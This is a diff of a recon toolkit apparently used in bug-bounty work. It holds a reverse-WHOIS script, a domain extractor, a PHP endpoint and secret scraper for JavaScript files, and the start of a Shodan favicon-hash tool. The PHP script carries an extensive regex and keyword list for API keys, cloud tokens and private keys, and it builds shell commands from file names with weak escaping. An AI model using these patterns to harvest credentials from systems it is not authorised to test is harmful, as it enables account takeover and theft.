    15  - for index in ['technical_contact','registrant_contact','administrative_contact']:
    16  - if index in t_json:
    17  - company,email = extractData( t_json[index] )
    18  - if company and company not in t_datas['companies']:
    19  - t_datas['companies'].append( company )
    20  - if email and email not in t_datas['emails']:
    21  - t_datas['emails'].append( email )
    22  - 
    23  - 
    24  -def extractData( tab ):
    25  - if not 'company_name' in tab:
    26  - company = False
    27  - elif 'registrant_contact' in t_json and 'company_name' in t_json['registrant_contact']:
    28  - company = t_json['registrant_contact']['company_name']
    29  - for wbl in w_blacklist:
    30  - if wbl in company.lower():
    31  - company = False
    32  - break
    33  - else:
    34  - company = False
    35  - 
    36  - 
    37  - if not 'email_address' in tab:
    38  - email = False
    39  - elif 'registrant_contact' in t_json and 'email_address' in t_json['registrant_contact']:
    40  - email = t_json['registrant_contact']['email_address']
    41  - for wbl in w_blacklist:
    42  - if wbl in email.lower():
    43  - email = False
    44  - break
    45  - else:
    46  - email = False
    47  - 
    48  - return company,email
    49  - 
    50  - 
    51  -parser = argparse.ArgumentParser()
    52  -parser.add_argument( "-e","--email",help="email you are looking for (required or -d or -c)" )
    53  -parser.add_argument( "-c","--company",help="company you are looking for (required or -d or -e)" )
    54  -parser.add_argument( "-d","--domain",help="domain you already know (required or -c)" )
    55  -parser.add_argument( "-k","--key",help="whoxy api key (required)" )
    56  -parser.add_argument( "-v","--verbose",help="enable verbose mode, default off", action="store_true" )
    57  -parser.parse_args()
    58  -args = parser.parse_args()
    59  - 
    60  -t_domains = []
    61  -t_datas = {
    62  - 'companies': [],
    63  - 'emails': []
    64  -}
    65  - 
    66  -if args.verbose:
    67  - _verbose = True
    68  -else:
    69  - _verbose = False
    70  - 
    71  -if args.company:
    72  - t_datas['companies'].append( args.company )
    73  - 
    74  -if args.email:
    75  - t_datas['emails'].append( args.email )
    76  - 
    77  -if args.domain:
    78  - _domain = args.domain
    79  -else:
    80  - _domain = False
    81  - 
    82  -if not _domain and not len(t_datas['companies']) and not len(t_datas['emails']):
    83  - parser.error( 'domain or company or email required' )
    84  - 
    85  -if args.key:
    86  - _key = args.key
    87  -else:
    88  - parser.error( 'api key is required' )
    89  - 
    90  - 
    91  -if _domain:
    92  - if _verbose:
    93  - sys.stdout.write( '%s[+] search for domain: %s%s\n' % (fg('green'),_domain,attr(0)) )
    94  - url = 'http://api.whoxy.com/?key='+_key+'&whois='+_domain
    95  - if _verbose:
    96  - print(url)
    97  - r = requests.get( url )
    98  - t_json = r.json()
    99  - # print(t_json)
    100  - extractDatas( t_json )
    101  - if _verbose:
    102  - print(t_datas)
    103  - 
    104  - 
    105  -for company in t_datas['companies']:
    106  - page = 1
    107  - company = company.replace( ' ', '+' )
    108  - if _verbose:
    109  - sys.stdout.write( '%s[+] search for company: %s%s\n' % (fg('green'),company,attr(0)) )
    110  - 
    111  - while True:
    112  - url = 'http://api.whoxy.com/?key='+_key+'&reverse=whois&company='+company+'&mode=micro&page='+str(page)
    113  - page = page + 1
    114  - if _verbose:
    115  - print(url)
    116  - r = requests.get( url )
    117  - t_json = r.json()
    118  - # print(t_json)
    119  - 
    120  - if 'search_result' in t_json and len(t_json['search_result']):
    121  - for result in t_json['search_result']:
    122  - if not result['domain_name'] in t_domains:
    123  - t_domains.append( result['domain_name'] )
    124  - print( result['domain_name'] )
    125  - else:
    126  - break
    127  - 
    128  - 
    129  -for email in t_datas['emails']:
    130  - page = 1
    131  - if _verbose:
    132  - sys.stdout.write( '%s[+] search for email: %s%s\n' % (fg('green'),email,attr(0)) )
    133  - 
    134  - while True:
    135  - url = 'http://api.whoxy.com/?key='+_key+'&reverse=whois&email='+email+'&mode=micro&page='+str(page)
    136  - page = page + 1
    137  - if _verbose:
    138  - print(url)
    139  - r = requests.get( url )
    140  - t_json = r.json()
    141  - # print(t_json)
    142  - 
    143  - if 'search_result' in t_json and len(t_json['search_result']):
    144  - for result in t_json['search_result']:
    145  - if not result['domain_name'] in t_domains:
    146  - t_domains.append( result['domain_name'] )
    147  - print( result['domain_name'] )
    148  - else:
    149  - break
    150  - 
  • ■ ■ ■ ■ ■
    extract-domains.py
    1  -#!/usr/bin/python2
    2  - 
    3  -# I don't believe in license.
    4  -# You can do whatever you want with this program.
     1 +#!/usr/bin/python3
    5 2   
    6 3  import os
    7 4  import sys
    8 5  import argparse
    9 6  import tldextract
    10  -from urlparse import urlparse
    11  - 
     7 +from urllib.parse import urlparse
    12 8   
    13 9  parser = argparse.ArgumentParser()
    14 10  parser.add_argument( "-u","--urls",help="set urls list (required)" )
    skipped 32 lines
    47 43   t_found.append( found )
    48 44   
    49 45  print( "\n".join(t_found) )
    50  -exit()
    51 46   
  • ■ ■ ■ ■ ■ ■
    extract-endpoints.php
    1  -#!/usr/bin/php
    2  -<?php
    3  - 
    4  -function usage( $err=null ) {
    5  - echo 'Usage: php '.$_SERVER['argv'][0]." -f/-d <source file/directory> [OPTIONS]\n\n";
    6  - echo "Options:\n";
    7  - echo "\t-b\tbeautify javascript files before parsing (requires js-beautify)\n";
    8  - echo "\t--bb\tbeautify and update source file (requires js-beautify)\n";
    9  - echo "\t-c\tsearch for comments instead of urls\n";
    10  - echo "\t-d\tset source directory (required)\n";
    11  - echo "\t-e\tfile to load (example: js,php,asp) (default: js)\n";
    12  - echo "\t-f\tset source file (required)\n";
    13  - echo "\t-g\tset regexp source file\n";
    14  - echo "\t--gg\tset regexp\n";
    15  - echo "\t-h\tforce host if none\n";
    16  - echo "\t-i\textensions we don't want to display separated by a comma (example: gif,jpg,png)\n";
    17  - echo "\t-k\tsearch for keywords instead of urls\n";
    18  - echo "\t-l\tfollow location\n";
    19  - echo "\t-n\textensions file we don't want to read separated by a comma (example: gif,jpg,png)\n";
    20  - echo "\t-r\talso scan subdirectories\n";
    21  - echo "\t-s\tforce https if no scheme\n";
    22  - echo "\t-t\ttest the urls found\n";
    23  - echo "\t-u\tremove duplicates (at your own risk!)\n";
    24  - echo "\t-v\tverbose mode: 0=all, 1=findings, 2=remove extra text\n";
    25  - echo "\n";
    26  - if( $err ) {
    27  - echo 'Error: '.$err."!\n";
    28  - }
    29  - exit();
    30  -}
    31  - 
    32  - 
    33  -require_once( 'Utils.php' );
    34  - 
    35  -define( 'MODE_ENDPOINT', 1 );
    36  -define( 'MODE_KEYWORD', 2 );
    37  -define( 'MODE_COMMENT', 3 );
    38  -define( 'DEFAULT_MODE', MODE_ENDPOINT );
    39  - 
    40  - 
    41  -$options = '';
    42  -$options .= 'b'; // beautify
    43  -$options .= 'c'; // looking for comments instead of enpoints
    44  -$options .= 'd:'; // source directory
    45  -$options .= 'e:'; // extension
    46  -$options .= 'f:'; // source file
    47  -$options .= 'g:'; // regexp file
    48  -$options .= 'h:'; // set host if none
    49  -$options .= 'i:'; // ignore extensions (list)
    50  -$options .= 'k'; // looking for keywords instead of enpoints
    51  -$options .= 'l'; // follow location
    52  -$options .= 'n:'; // ignore extensions (read)
    53  -$options .= 'r'; // recursive (scan subdir)
    54  -$options .= 's'; // force https
    55  -$options .= 't'; // test url
    56  -$options .= 'v:'; // verbose
    57  -$long_options = ['bb','gg:'];
    58  -$t_options = getopt( $options, $long_options );
    59  -//var_dump($t_options);
    60  -if( !count($t_options) ) {
    61  - usage();
    62  -}
    63  - 
    64  - 
    65  -if( isset($t_options['t']) ) {
    66  - $_test = true;
    67  -} else {
    68  - $_test = false;
    69  -}
    70  - 
    71  -if( isset($t_options['r']) ) {
    72  - $_recurs = true;
    73  -} else {
    74  - $_recurs = false;
    75  -}
    76  - 
    77  -if( isset($t_options['l']) ) {
    78  - $_location = true;
    79  -} else {
    80  - $_location = false;
    81  -}
    82  - 
    83  -if( isset($t_options['s']) ) {
    84  - $_scheme = 'https';
    85  -} else {
    86  - $_scheme = 'http';
    87  -}
    88  - 
    89  -if( isset($t_options['b']) || isset($t_options['bb']) ) {
    90  - $_beautify = true;
    91  -} else {
    92  - $_beautify = false;
    93  -}
    94  -if( isset($t_options['bb']) ) {
    95  - $_beautify_alter = true;
    96  -} else {
    97  - $_beautify_alter = false;
    98  -}
    99  - 
    100  -if( isset($t_options['h']) ) {
    101  - $_host = $t_options['h'];
    102  -} else {
    103  - $_host = null;
    104  -}
    105  - 
    106  -if( isset($t_options['v']) ) {
    107  - $_verbose = (int)$t_options['v'];
    108  -} else {
    109  - $_verbose = 0;
    110  -}
    111  - 
    112  -if( isset($t_options['f']) ) {
    113  - $f = $t_options['f'];
    114  - if( !is_file($f) ) {
    115  - usage( 'Source file not found' );
    116  - } else {
    117  - $_t_source = [$f];
    118  - }
    119  -} elseif( isset($t_options['d']) ) {
    120  - $d = $t_options['d'];
    121  - if( !is_dir($d) ) {
    122  - usage( 'Source file not found' );
    123  - } else {
    124  - $d = rtrim( $d, '/' );
    125  - if( isset($t_options['e']) ) {
    126  - $_loadext = explode( ',', $t_options['e'] );
    127  - } else {
    128  - $_loadext = ['js'];
    129  - }
    130  - $_t_source = [];
    131  - foreach( $_loadext as $e ) {
    132  - if( $_recurs ) {
    133  - $output = null;
    134  - if( $e == '*' ) {
    135  - $cmd = 'find "'.escapeshellcmd($d).'" -type f 2>/dev/null';
    136  - } else {
    137  - $cmd = 'find "'.escapeshellcmd($d).'" -type f -name "*.'.$e.'" 2>/dev/null';
    138  - }
    139  - //echo $cmd."\n";
    140  - exec( $cmd, $output );
    141  - $_t_source = array_merge( $_t_source, $output );
    142  - } else {
    143  - if( $e == '*' ) {
    144  - $_t_source = array_merge( $_t_source, glob( $d.'/*.'.trim($e) ) );
    145  - } else {
    146  - $_t_source = array_merge( $_t_source, glob( $d.'/*.'.trim($e) ) );
    147  - }
    148  - }
    149  - }
    150  - }
    151  -} else {
    152  - usage();
    153  -}
    154  - 
    155  -if( isset($t_options['i']) ) {
    156  - $_ignore = explode( ',', $t_options['i'] );
    157  -} else {
    158  - $_ignore = null;
    159  -}
    160  - 
    161  -if( isset($t_options['n']) ) {
    162  - $_dontread = explode( ',', $t_options['n'] );
    163  -} else {
    164  - $_dontread = [];
    165  -}
    166  - 
    167  -$_url_chars = '[a-zA-Z0-9\-\.\?\#&=_:/]';
    168  -$_regexp = [
    169  - '|["]('.$_url_chars.'+/'.$_url_chars.'+)?["]|',
    170  - '#[\'"\(].*(http[s]?://.*?)[\'"\)]#',
    171  - '#[\'"\(](http[s]?://.*?).*[\'"\)]#',
    172  - '#[\'"\(]([^\'"\(]*\.sdirect[^\'"\(]*?)[\'"\)]#',
    173  - '#[\'"\(]([^\'"\(]*\.htm[^\'"\(]*?)[\'"\)]#',
    174  - '#[\'"\(]([^\'"\(]*\.html[^\'"\(]*?)[\'"\)]#',
    175  - '#[\'"\(]([^\'"\(]*\.php[^\'"\(]*?)[\'"\)]#',
    176  - '#[\'"\(]([^\'"\(]*\.asp[^\'"\(]*?)[\'"\)]#',
    177  - '#[\'"\(]([^\'"\(]*\.aspx[^\'"\(]*?)[\'"\)]#',
    178  - //'#[\'"\(]([^\'"\(]*\.json[^\'"\(]*?)[\'"\)]#',
    179  - //'#[\'"\(]([^\'"\(]*\.xml[^\'"\(]*?)[\'"\)]#',
    180  - //'#[\'"\(]([^\'"\(]*\.ini[^\'"\(]*?)[\'"\)]#',
    181  - //'#[\'"\(]([^\'"\(]*\.conf[^\'"\(]*?)[\'"\)]#',
    182  - //'#href\s*=\s*[\'"](.*?)[\'"]#',
    183  - '#href\s*=\s*[\'](.*?)[\']#',
    184  - '#href\s*=\s*["](.*?)["]#',
    185  - '#src\s*=\s*[\'](.*?)[\']#',
    186  - '#src\s*=\s*["](.*?)["]#',
    187  - //'#src[\s]*=[\s]*[\'"](.*?)[>]#',
    188  - '#url\s*[:=].*[\'](.*?)[\']#',
    189  - '#url\s*[:=].*?["](.*?)["]#',
    190  - '#urlRoot\s*:.*[\'](.*?)[\']#',
    191  - '#urlRoot\s*:.*?["](.*?)["]#',
    192  - '#endpoint[s]?\s*:.*[\'](.*?)[\']#',
    193  - '#endpoint[s]?\s*:.*?["](.*?)["]#',
    194  - '#[\'"]script[\'"]\s*:\s*[\'"](.*?)[\'"]#',
    195  - '#\.ajax\s*\(\s*[\'"](.*?)[\'"]#',
    196  - '#\.get\s*\(\s*[\'"](.*?)[\'"]#',
    197  - '#\.post\s*\(\s*[\'"](.*?)[\'"]#',
    198  - '#\.load\s*\(\s*[\'"](.*?)[\'"]#',
    199  - //'#href|src\s*=\s*["](.*?)["]#',
    200  - //'#href|src\s*=\s*[\'](.*?)[\']#',
    201  - //'#endpoint[s]?|url|urlRoot|href\s*:.*["](.*?)["]#',
    202  - //'#endpoint[s]?|url|urlRoot|src\s*:.*[\'](.*?)[\']#',
    203  -];
    204  -$_comment = [
    205  - '#<!--(.*?)-->#s', // <!-- ->>
    206  - '#/\*(.*?)\*/#s', // /* ... */
    207  - '#//(.*)#', // // ...
    208  -];
    209  -$_comments_regexp = '('.implode( '|', $_comment ).')';
    210  -$_keywords_sensitive = [
    211  - '[a-fA-F0-9]{32}(?:[a-fA-F0-9]{8})?(?:[a-fA-F0-9]{16})?(?:[a-fA-F0-9]{8})?(?:[a-fA-F0-9]{32})?(?:[a-fA-F0-9]{32})?', // mdx
    212  - //'[\'\"][a-f0-9]{32}[\'\"]', // md5
    213  - '[\'\"][a-f0-9]{40}[\'\"]', // sometimes...
    214  - '[1-9][0-9]+-[0-9a-zA-Z]{40}', // Twitter
    215  - 'EAACEdEose0cBA[0-9A-Za-z]+', // Facebook
    216  - 'AIza[_0-9A-Za-z\-]{35}', // YouTube/Gmail/Gdrive api key
    217  - '[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com', // YouTube/Gmail/Gdrive oauth id
    218  - 'sk_live_[0-9a-z]{32}', // Picatic
    219  - 'sk_live_[0-9a-zA-Z]{24}', // Stripe standard restricted
    220  - 'rk_live_[0-9a-zA-Z]{24}', // Stripe
    221  - 'sq0atp-[_0-9A-Za-z\-]{22}', // Square access token
    222  - 'sq0csp-[_0-9A-Za-z\-]{43}', // Square oauth secret
    223  - 'access_token\$production\$[0-9a-z]{16}\$[0-9a-f]{32}', // PayPal Braintree
    224  - 'amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}', // Amazon MWS
    225  - 'AC[0-9a-fA-F]{32}', // Twilio client
    226  - 'SK[0-9a-fA-F]{32}', // Twilio secret
    227  - 'key-[0-9a-zA-Z]{32}', // MailGun
    228  - '[0-9a-f]{32}-us[0-9]{1,2}', // MailChimp
    229  - '[\'\"][A-Z0-9]{20}[\'\"]', // aws secret
    230  - '[\'\"][a-zA-Z0-9/]{40}[\'\"]', // aws api key
    231  - 'AKIA[0-9A-Z]{16}', // AWS client id
    232  - 'ASIA[0-9A-Z]{16}', // AWS client id
    233  - // '([^A-Z0-9]|^)(AKIA|A3T|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{12,}', // AWS by TomNomNom
    234  - // '[0-9a-zA-Z/+]{40}', // AWS secret
    235  - // '[0-9a-zA-Z_]{5,31}', // Bitly client id
    236  - 'R_[0-9a-f]{32}', // Bitly secret
    237  - // '[0-9]{13,17}', // Facebook client
    238  - // '[0-9a-f]{32}', // Facebook secret
    239  - // '[0-9a-f]{32}', // flickr client
    240  - // '[0-9a-f]{16}', // flickr secret
    241  - // '[0-9A-Z]{48}', // foursquare client
    242  - // '[0-9A-Z]{48}', // foursquare secret
    243  - // '[0-9a-z]{12}', // LinkedIn client
    244  - // '[0-9a-zA-Z]{16}', // LinkedIn secret
    245  - // '[0-9a-zA-Z]{18,25}', // twitter client
    246  - // '[0-9a-zA-Z]{35,44}', // twitter secret
    247  -];
    248  -$_keywords_insensitive = [
    249  - //'auth',
    250  - //'private',
    251  - //'mysql',
    252  - //'dump',
    253  - //'login',
    254  - //'password',
    255  - //'credential',
    256  - //'oauth',
    257  - //'token',
    258  - 'access_token',
    259  - 'access_secret',
    260  - 'apikey',
    261  - 'api_key',
    262  - 'app_key',
    263  - 'client_secret',
    264  - 'consumer_secret',
    265  - 'customer_secret',
    266  - 'user_secret',
    267  - 'secret_key',
    268  - 'access_key',
    269  - 'fb_secret',
    270  - 'dbpasswd',
    271  - 'DB_PASSWORD',
    272  - 'DB_USERNAME',
    273  - 'JEKYLL_GITHUB_TOKEN',
    274  - 'oauth_token',
    275  - 'PT_TOKEN',
    276  - 'SF_USERNAME',
    277  - '-----BEGIN RSA PRIVATE KEY-----',
    278  - '-----BEGIN EC PRIVATE KEY-----',
    279  - '-----BEGIN PRIVATE KEY-----',
    280  - '-----BEGIN PGP PRIVATE KEY BLOCK-----',
    281  - '.apps.googleusercontent.com',
    282  - 'sq0atp',
    283  - 'sq0csp',
    284  - 'sk_live_',
    285  - 'rk_live_',
    286  - 'xoxb-',
    287  - //'secret',
    288  - 'gsecr',
    289  - //'username',
    290  - 'id_rsa',
    291  - 'id_dsa',
    292  - //'\.json',
    293  - //'\.xml',
    294  - //'\.yaml',
    295  - //'\.saml',
    296  - //'config',
    297  - '\.pem',
    298  - '\.ppk',
    299  - '\.sql',
    300  - //'\.conf',
    301  - //'\.ini',
    302  - //'\.php',
    303  - //'\.asp',
    304  - 's3\.amazonaws\.com',
    305  - 'storage\.googleapis\.com',
    306  - 'storage\.cloud\.google\.com',
    307  - '\.digitaloceanspaces\.com',
    308  -];
    309  -$_keywords_sensitive_regexp = '('.implode( '|', $_keywords_sensitive ).')';
    310  -$_keywords_insensitive_regexp = '('.implode( '|', $_keywords_insensitive ).')';
    311  - 
    312  -$_mode = MODE_ENDPOINT;
    313  -if( isset($t_options['k']) ) {
    314  - $_mode = MODE_KEYWORD;
    315  - $_regexp = array_merge( $_keywords_sensitive, $_keywords_insensitive );
    316  -}
    317  -elseif( isset($t_options['c']) ) {
    318  - $_mode = MODE_COMMENT;
    319  - $_regexp = array_merge( $_comment );
    320  -}
    321  - 
    322  -if( isset($t_options['g']) ) {
    323  - $g = $t_options['g'];
    324  - if( !is_file($g) ) {
    325  - usage( 'Regexp file not found' );
    326  - }
    327  - $_regexp = file( $g, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES );
    328  -}
    329  -if( isset($t_options['gg']) ) {
    330  - $_regexp = [ $t_options['gg'] ];
    331  - $_keywords_sensitive_regexp = $t_options['gg'];
    332  - $_comments_regexp = $_comment = $t_options['gg'];
    333  -}
    334  - 
    335  -$n_regexp = count( $_regexp );
    336  -if( $_verbose < 2 ) {
    337  - echo $n_regexp." regexp loaded.\n";
    338  - echo count($_t_source)." files loaded.\n\n";
    339  -}
    340  - 
    341  - 
    342  -foreach( $_t_source as $s )
    343  -{
    344  - $p = strrpos( $s, '.' );
    345  - if( $p !== false ) {
    346  - $ext = substr( $s, $p+1 );
    347  - if( in_array($ext,$_dontread) ) {
    348  - continue;
    349  - }
    350  - }
    351  - 
    352  - if( $_beautify ) {
    353  - ob_start();
    354  - system( 'js-beautify '.$s );
    355  - $buffer = ob_get_contents();
    356  - ob_end_clean();
    357  - if( $_beautify_alter ) {
    358  - file_put_contents( $s, $buffer );
    359  - }
    360  - } else {
    361  - $buffer = file_get_contents( $s );
    362  - }
    363  - 
    364  - ob_start();
    365  - 
    366  - if( $_mode == MODE_KEYWORD )
    367  - {
    368  - $ss = escapeshellcmd( $s );
    369  - $ss = str_replace( '\?', '?', $s );
    370  - 
    371  - $output = null;
    372  - $cmd = 'egrep -n "'.$_keywords_sensitive_regexp.'" "'.$ss.'"';
    373  - echo $cmd."\n";
    374  - exec( $cmd, $output );
    375  - $n_sensitive = printColoredGrep( $_keywords_sensitive_regexp, implode("\n",$output), 1 );
    376  - 
    377  - if( $_keywords_insensitive_regexp != $_keywords_sensitive_regexp ) {
    378  - $output = null;
    379  - $cmd = 'egrep -i -n "'.$_keywords_insensitive_regexp.'" "'.$ss.'"';
    380  - exec( $cmd, $output );
    381  - $n_insensitive = printColoredGrep( $_keywords_insensitive_regexp, implode("\n",$output), 0 );
    382  - }
    383  - 
    384  - $n_total = $n_sensitive + $n_insensitive;
    385  - if( $_verbose < 2 ) {
    386  - echo $n_total." keywords found!\n";
    387  - }
    388  - }
    389  - elseif( $_mode == MODE_COMMENT )
    390  - {
    391  - $n_total = 0;
    392  - foreach( $_comment as $r ) {
    393  - $m = preg_match_all( $r, $buffer, $matches );
    394  - //var_dump( $matches );
    395  - if( $m ) {
    396  - $n_total += count( $matches[0] );
    397  - foreach( $matches[0] as $m ) {
    398  - echo preg_replace('#\s+#',' ',$m)."\n";
    399  - }
    400  - }
    401  - }
    402  - /*$output = null;
    403  - $cmd = 'egrep -n "'.$_comments_regexp.'" "'.$s.'"';
    404  - var_dump( $cmd );
    405  - exec( $cmd, $output );
    406  - $n_total = printColoredGrep( $_comments_regexp, implode("\n",$output), 1 );
    407  - echo $n_total." keywords found!\n";*/
    408  - if( $_verbose < 2 ) {
    409  - echo $n_total." comments found!\n";
    410  - }
    411  - }
    412  - else
    413  - {
    414  - list($t_final,$t_possible) = run( $buffer );
    415  - clean( $t_final );
    416  - $n_final = count($t_final);
    417  - $n_possible = count($t_possible);
    418  - 
    419  - if( $n_final ) {
    420  - $t_final = array_unique( $t_final );
    421  - $n_final = count( $t_final );
    422  - foreach( $t_final as $u ) {
    423  - echo $u;
    424  - if( $_test && stripos('http',$u)==0 ) {
    425  - $http_code = testUrl( $u, $_location );
    426  - if( $http_code == 200 ) {
    427  - $color = 'green';
    428  - } else {
    429  - $color = 'red';
    430  - }
    431  - $txt = ' ('.$http_code.')';
    432  - Utils::_print( $txt, $color );
    433  - }
    434  - echo "\n";
    435  - }
    436  - }
    437  - if( $_verbose < 2 ) {
    438  - echo $n_final." urls found!\n";
    439  - }
    440  - 
    441  - if( $n_possible && $_verbose<2 ) {
    442  - Utils::_println( str_repeat('-',100), 'light_grey' );
    443  - $t_possible = array_unique( $t_possible );
    444  - Utils::_println( implode( "\n",$t_possible), 'light_grey' );
    445  - Utils::_println( $n_possible." possible...", 'light_grey' );
    446  - }
    447  - 
    448  - $n_total = $n_possible + $n_final;
    449  - }
    450  - 
    451  - $buffer = ob_get_contents();
    452  - ob_end_clean();
    453  - 
    454  - if( $_verbose == 0 || $n_total ) {
    455  - if( $_verbose < 2 ) {
    456  - Utils::_println( "Loading: ".$s, 'yellow' );
    457  - }
    458  - echo $buffer;
    459  - if( $_verbose < 2 ) {
    460  - echo "\n";
    461  - }
    462  - }
    463  -}
    464  - 
    465  - 
    466  -function testUrl( $url, $follow_location )
    467  -{
    468  - $c = curl_init();
    469  - curl_setopt( $c, CURLOPT_URL, $url );
    470  - curl_setopt( $c, CURLOPT_CUSTOMREQUEST, 'HEAD' );
    471  - //curl_setopt( $c, CURLOPT_HEADER, true );
    472  - //curl_setopt( $c, CURLOPT_SSL_VERIFYPEER, false );
    473  - curl_setopt( $c, CURLOPT_NOBODY, true );
    474  - curl_setopt( $c, CURLOPT_CONNECTTIMEOUT, 3 );
    475  - curl_setopt( $c, CURLOPT_FOLLOWLOCATION, $follow_location );
    476  - curl_setopt( $c, CURLOPT_RETURNTRANSFER, true );
    477  - $r = curl_exec( $c );
    478  - 
    479  - $t_info = curl_getinfo( $c );
    480  - 
    481  - return $t_info['http_code'];
    482  -}
    483  - 
    484  - 
    485  -function printColoredGrep( $regexp, $str, $case_sensitive )
    486  -{
    487  - //$p = 0;
    488  - //$l = strlen( $str );
    489  - //$m = preg_match_all( '#'.$regexp.'#i', $str, $matches, PREG_OFFSET_CAPTURE );
    490  - //var_dump( $matches );
    491  - 
    492  - if( $case_sensitive ) {
    493  - $flag = '';
    494  - } else {
    495  - $flag = 'i';
    496  - }
    497  - 
    498  - $colored = preg_replace( '#'.$regexp.'#'.$flag, "\033[0;32m".'\\1'."\033[0m", $str, -1, $cnt );
    499  - if( $cnt ) {
    500  - echo $colored."\n";
    501  - }
    502  - //var_dump( $str );
    503  - //Utils::_print( '('.($line>=0?$line:'-').') ', 'yellow' );
    504  - /*
    505  - if( $m ) {
    506  - $n = count( $matches[0] );
    507  - //var_dump($n);
    508  - for( $i=0 ; $i<$n ; $i++ ) {
    509  - $s1 = substr( $str, $p, ($matches[0][$i][1]-$p) );
    510  - $s2 = substr( $str, $matches[0][$i][1], $l );
    511  - $p = $matches[0][$i][1] + $l;
    512  - //$p = $matches[$i][1] + $l;
    513  - Utils::_print( $s1, 'white' );
    514  - Utils::_print( $s2, 'light_green' );
    515  - //break;
    516  - }
    517  - }
    518  - 
    519  - $s3 = substr( $str, $p );
    520  - Utils::_print( $s3, 'white' );*/
    521  - return $cnt;
    522  -}
    523  - 
    524  - 
    525  -function run( $buffer )
    526  -{
    527  - global $_regexp, $_ignore, $_url_chars;
    528  - //var_dump( $_regexp );
    529  - 
    530  - $t_all = [];
    531  - 
    532  - foreach( $_regexp as $r ) {
    533  - $m = preg_match_all( $r.'i', $buffer, $matches );
    534  - //var_dump( $matches );
    535  - if( $m ) {
    536  - //var_dump( $matches );
    537  - $t_all = array_merge( $t_all, $matches[1] );
    538  - }
    539  - }
    540  - 
    541  - $t_exclude_extension = [ ];
    542  - $t_exclude_domain = [ ];
    543  - $t_exclude_scheme = [ 'javascript', 'mailto', 'data', 'about', 'file' ];
    544  - $t_exclude_string = [ ];
    545  - $t_exclude_possible = [ '+', '==', 'MM/DD/YYYY', 'text/plain', 'text/html', 'text/css', 'text/javascript', 'application/x-www-form-urlencoded', 'application/javascript', 'application/json', 'image/jpeg', 'image/gif', 'image/png', 'www.w3.org' ];
    546  - 
    547  - $t_possible = [];
    548  - $t_all = array_unique( $t_all );
    549  - //var_dump( $t_all );
    550  - 
    551  - foreach( $t_all as $k=>&$url )
    552  - {
    553  - //var_dump($url);
    554  - //$url = urldecode( $url );
    555  - 
    556  - $test = preg_replace( '#[^0-9a-zA-Z]#', '', $url );
    557  - if( $test == '' ) {
    558  - unset( $t_all[$k] );
    559  - continue;
    560  - }
    561  - 
    562  - $parse = parse_url( $url );
    563  - //var_dump($parse);
    564  - if( !$parse ) {
    565  - unset( $t_all[$k] );
    566  - $t_possible[] = $url;
    567  - continue;
    568  - }
    569  - 
    570  - foreach( $t_exclude_string as $s ) {
    571  - if( strstr($url,$s) ) {
    572  - unset( $t_all[$k] );
    573  - $t_possible[] = $url;
    574  - continue;
    575  - }
    576  - }
    577  - 
    578  - foreach( $t_exclude_possible as $s ) {
    579  - if( strstr($url,$s) ) {
    580  - unset( $t_all[$k] );
    581  - $t_possible[] = $url;
    582  - continue;
    583  - }
    584  - }
    585  - 
    586  - if( isset($parse['scheme']) && in_array($parse['scheme'],$t_exclude_scheme) ) {
    587  - unset( $t_all[$k] );
    588  - $t_possible[] = $url;
    589  - continue;
    590  - }
    591  - 
    592  - if( isset($parse['path']) && is_array($_ignore) && count($_ignore) ) {
    593  - $p = strrpos( $parse['path'], '.' );
    594  - if( $p !== false ) {
    595  - $ext = substr( $parse['path'], $p+1 );
    596  - if( in_array($ext,$_ignore) ) {
    597  - unset( $t_all[$k] );
    598  - continue;
    599  - }
    600  - }
    601  - }
    602  - 
    603  - if( $url[0] == '#' ) {
    604  - unset( $t_all[$k] );
    605  - $t_possible[] = $url;
    606  - continue;
    607  - }
    608  - 
    609  - if( isset($parse['path']) )
    610  - {
    611  - if( strstr($parse['path'],' ') !== false ) {
    612  - $tmp = explode( ' ', $parse['path'] );
    613  - $parse['path'] = $tmp[0];
    614  - }
    615  - 
    616  - $kk = preg_replace('|'.$_url_chars.'|i','',$parse['path']);
    617  - if( strlen($kk) != 0 ) {
    618  - unset( $t_all[$k] );
    619  - $t_possible[] = $url;
    620  - continue;
    621  - }
    622  - }
    623  - }
    624  - 
    625  - //var_dump($t_all);
    626  - return [$t_all,$t_possible];
    627  -}
    628  - 
    629  - 
    630  -function clean( &$t_urls )
    631  -{
    632  - global $_scheme, $_host, $_ignore;
    633  - 
    634  - $scheme = $host = '';
    635  - 
    636  - foreach( $t_urls as &$u )
    637  - {
    638  - //var_dump( $u );
    639  - $scheme = $host = '';
    640  - $parse = parse_url( $u );
    641  - //var_dump( $parse );
    642  - 
    643  - if( isset($parse['host']) ) {
    644  - $host = $parse['host'];
    645  - } elseif( $_host ) {
    646  - $host = $_host;
    647  - $u = ltrim( $u, '/' );
    648  - $u = $host . '/' . $u;
    649  - }
    650  - 
    651  - if( isset($parse['scheme']) && $parse['scheme'] != NULL ) {
    652  - $scheme = $parse['scheme'];
    653  - } elseif( $host ) {
    654  - $scheme = $_scheme;
    655  - $u = ltrim( $u, '/' );
    656  - $u = $scheme . '://' . $u;
    657  - }
    658  - 
    659  - if( strstr($u,' ') !== false ) {
    660  - $tmp = explode( ' ', $u );
    661  - $u = $tmp[0];
    662  - }
    663  - }
    664  -}
    665  - 
    666  - 
  • ■ ■ ■ ■ ■ ■
    favicon-hashtrick.py
    1  -#!/usr/bin/python3
    2  - 
    3  -# I don't believe in license.
    4  -# You can do whatever you want with this program.
    5  - 
    6  -# Reference: https://twitter.com/noneprivacy/status/1177629325266505728
    7  - 
    8  -import re
    9  -import sys
    10  -import requests
    11  -import base64
    12  -import mmh3
    13  -import argparse
    14  -from shodan import Shodan
    15  -from colored import fg, bg, attr
    16  - 
    17  - 
    18  -# disable "InsecureRequestWarning: Unverified HTTPS request is being made."
    19  -from requests.packages.urllib3.exceptions import InsecureRequestWarning
    20  -requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
    21  - 
    22  - 
    23  -def banner():
    24  - print("""
    25  - __ _ _ _ _ _ _
    26  - / _| __ ___ _(_) ___ ___ _ __ | |__ __ _ ___| |__ | |_ _ __(_) ___| | __ _ __ _ _
    27  -| |_ / _` \ \ / / |/ __/ _ \| '_ \ | '_ \ / _` / __| '_ \| __| '__| |/ __| |/ / | '_ \| | | |
